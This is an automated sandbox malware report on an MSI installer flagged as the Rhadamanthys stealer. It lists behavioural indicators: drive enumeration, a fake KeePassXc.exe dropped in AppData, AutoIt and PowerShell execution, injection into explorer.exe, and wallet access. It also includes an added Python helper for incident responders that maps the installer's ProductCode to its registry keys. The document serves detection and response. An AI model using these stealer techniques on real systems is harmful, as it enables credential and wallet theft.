Malware Analysis Report

2024-10-10 13:33

Sample ID 240601-1rpz6sfh61
Target setup.msi
SHA256 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
Tags: execution spyware rhadamanthys stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

execution spyware rhadamanthys stealer

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates connected drives

Suspicious use of SetThreadContext

Command and Scripting Interpreter: AutoIT

Loads dropped DLL

Executes dropped EXE

Drops file in Windows directory

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-01 21:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-01 21:53
Reported: 2024-06-01 22:12
Platform: win10v2004-20240426-en
Max time kernel: 272s
Max time network: 278s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A

Command and Scripting Interpreter: AutoIT

execution
Description Indicator Process Target
N/A N/A \??\c:\st\Autoit3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3492 set thread context of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e5737c9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3856.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3952.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5737c9.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4D99.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5737cd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI38F3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3972.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI39B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3A2F.tmp C:\Windows\system32\msiexec.exe N/A
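
The SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} entry and the cached e5737c9.msi / e5737cd.msi copies are Windows Installer registering the package under its ProductCode. On a host that actually ran this installer, that registration lives under registry keys named by the "packed" form of the GUID (first three groups reversed whole, last two reversed pair by pair), which is why searching the registry for the braced GUID under Installer\UserData finds nothing. The Python below is an added example, not part of the sandbox report or its tooling: it converts the ProductCode to the packed key name and back, pulls the GUID out of the SourceHash path, and builds the registry paths an incident responder would query for the cached package location (the LocalPackage value) and product name. The key layout assumes a per-machine install, which is recorded under the LocalSystem SID S-1-5-18; for a per-user install pass the installing user's SID instead. The per-machine assumption is this example's, not a finding of the report.

```python
import re

# ProductCode taken from the SourceHash{...} file name in the table above.
PRODUCT_CODE = "{BFB3A06C-96C7-42C4-A90F-78C892A36FF8}"

GUID_RE = re.compile(
    r"^\{?([0-9A-Fa-f]{8})-([0-9A-Fa-f]{4})-([0-9A-Fa-f]{4})-"
    r"([0-9A-Fa-f]{4})-([0-9A-Fa-f]{12})\}?$"
)


def _swap_pairs(s):
    """Reverse each two-character pair: 'A90F' -> '9AF0'."""
    return "".join(s[i + 1] + s[i] for i in range(0, len(s), 2))


def pack_guid(guid):
    """Turn a ProductCode GUID into the 'packed' form Windows Installer uses
    as a registry key name: the first three groups are reversed whole, the
    last two groups are reversed pair by pair."""
    m = GUID_RE.match(guid.strip())
    if not m:
        raise ValueError(f"not a GUID: {guid!r}")
    g1, g2, g3, g4, g5 = (x.upper() for x in m.groups())
    return g1[::-1] + g2[::-1] + g3[::-1] + _swap_pairs(g4) + _swap_pairs(g5)


def unpack_guid(packed):
    """Inverse of pack_guid(): registry key name -> braced ProductCode."""
    if not re.fullmatch(r"[0-9A-Fa-f]{32}", packed):
        raise ValueError(f"not a packed GUID: {packed!r}")
    p = packed.upper()
    return "{%s-%s-%s-%s-%s}" % (
        p[0:8][::-1], p[8:12][::-1], p[12:16][::-1],
        _swap_pairs(p[16:20]), _swap_pairs(p[20:32]),
    )


def product_code_from_sourcehash(path):
    """Pull the ProductCode out of a C:\\Windows\\Installer\\SourceHash{GUID} path."""
    m = re.search(r"SourceHash(\{[0-9A-Fa-f-]{36}\})", path)
    return m.group(1).upper() if m else None


def registry_paths(guid, per_machine=True, user_sid=None):
    """Registry locations where Windows Installer records the product.
    Per-machine installs register under the LocalSystem SID S-1-5-18
    (assumed here); per-user installs use the installing user's SID."""
    packed = pack_guid(guid)
    sid = "S-1-5-18" if per_machine else user_sid
    if sid is None:
        raise ValueError("user_sid is required for a per-user install")
    userdata = rf"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\{sid}\Products\{packed}"
    hive = "HKLM" if per_machine else "HKCU"
    return {
        # LocalPackage under this key names the cached copy in C:\Windows\Installer
        "install_properties": userdata + r"\InstallProperties",
        "products": (rf"HKLM\SOFTWARE\Classes\Installer\Products\{packed}" if per_machine
                     else rf"HKCU\Software\Microsoft\Installer\Products\{packed}"),
        # Uninstall entries for MSI products are keyed by the braced ProductCode
        "uninstall": rf"{hive}\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{guid.strip().upper()}",
    }


if __name__ == "__main__":
    code = product_code_from_sourcehash(
        r"C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8}")
    print("ProductCode:", code, "packed:", pack_guid(code))
    for name, key in registry_paths(code).items():
        print(f"{name:>18}: {key}")
```

Feed the printed InstallProperties path to reg query or Get-ItemProperty on the affected host; the LocalPackage value should point at the cached MSI in C:\Windows\Installer, which is the copy to hash against the SHA256 at the top of this report.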

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 \??\c:\st\Autoit3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString \??\c:\st\Autoit3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "2" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\GroupByKey:PID = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-51#immutable1 = "Date and Time" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 1e007180000000000000000000006abe817b2bce7646a29eeb907a5126c50000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f706806ee260aa0d7449371beb064c986830000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-301#immutable1 = "Configure your audio devices or change the sound scheme for your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "2" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" C:\Windows\explorer.exe N/A
